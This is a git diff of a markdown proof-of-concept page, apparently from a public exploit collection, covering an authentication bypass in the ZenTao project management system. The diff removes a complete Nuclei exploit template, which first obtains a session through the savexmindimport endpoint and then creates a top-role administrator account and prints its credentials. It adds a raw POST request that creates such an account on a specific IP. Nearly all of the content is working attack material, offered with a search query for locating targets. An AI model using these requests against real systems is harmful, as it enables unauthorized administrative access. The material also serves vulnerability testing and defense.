diff --git a/禅道项目管理系统身份认证绕过漏洞.md b/禅道项目管理系统身份认证绕过漏洞.md index dcc600a..7a72f9d 100644 --- a/禅道项目管理系统身份认证绕过漏洞.md +++ b/禅道项目管理系统身份认证绕过漏洞.md @@ -46,79 +46,14 @@ http: ## 添加用户poc ``` -id: easycorp-zentao-pms-idor-exp - -info: - name: 禅道项目管理系统身份认证绕过漏洞 - author: GuoRong_X - severity: critical - description: | - - 禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。 - reference: - - https://mp.weixin.qq.com/s/hiGI_fQmXOHdkPqn6x00Jw - metadata: - verified: true - fofa-query: title="用户登录- 禅道" - tags: zentao -variables: - username: '{{rand_base(6)}}' - password: '{{rand_base(12)}}' - -http: - - raw: - - | - GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - GET /biz/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - GET /max/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1 - Host: {{Hostname}} - - - | - POST /api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - - - | - POST /zentao/api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - - - | - POST /biz/api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - - - | - POST /max/api.php/v1/users HTTP/1.1 - Host: {{Hostname}} - - {"account": "{{username}}", "password": "{{password}}", "realname": "{{username}}", "role": "top", "group": "1"} - cookie-reuse: true - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_5, "{{username}}") || contains(body_6, "{{username}}") || contains(body_7, "{{username}}") || contains(body_8, "{{username}}")' - condition: and - - extractors: - - type: dsl - dsl: - - '"USER: "+ username' - - '"PASS: "+ password' -# digest: 4a0a00473045022100f877e8e0df5985e15645227a3f12f66e08fe50250102f4df141f234afcc0e2e90220485c468e8de448c3e9c92875d8a1bd6d8fafffa0f294fffd4a4443e221e6de6b:58d4ffcb61df0489d6ab2fd018c17de6 +POST /biz/api.php/v1/users HTTP/1.1 +Host: 192.168.0.102 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Cookie: zentaosid=d95c19a900256b7dc3c3f1866b1d121c +{"account": "asda33", "password": "QQqq123456", "realname": "asda33", "role": "top", "group": "1"} ``` +![image](https://github.com/wy876/POC/assets/139549762/1c15070d-1563-4573-aff9-5da0da8c5848) + +